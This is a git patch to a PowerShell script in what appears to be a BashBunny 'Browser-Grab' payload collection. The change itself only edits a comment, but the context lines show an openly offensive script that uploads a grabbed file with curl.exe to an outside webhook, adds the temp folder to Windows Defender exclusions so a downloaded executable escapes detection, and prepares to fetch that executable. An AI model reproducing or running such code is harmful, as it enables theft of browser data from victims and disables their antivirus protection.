From 4da306f80b9c540633b01a574fb94b9df455f639 Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Thu, 5 Jan 2023 21:12:20 -0500 Subject: [PATCH] Update b.ps1 --- BashBunny/payloads/Browser-Grab/b.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/BashBunny/payloads/Browser-Grab/b.ps1 b/BashBunny/payloads/Browser-Grab/b.ps1 index da30303..d5f4903 100644 --- a/BashBunny/payloads/Browser-Grab/b.ps1 +++ b/BashBunny/payloads/Browser-Grab/b.ps1 @@ -23,7 +23,7 @@ if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} -# Add C:/ to exlusions so Windows Defender doesnt flag the exe we will download +# Add $env:tmp to exlusions so Windows Defender doesnt flag the exe we will download Add-MpPreference -ExclusionPath $env:tmp # Download the exe and save it to temp directory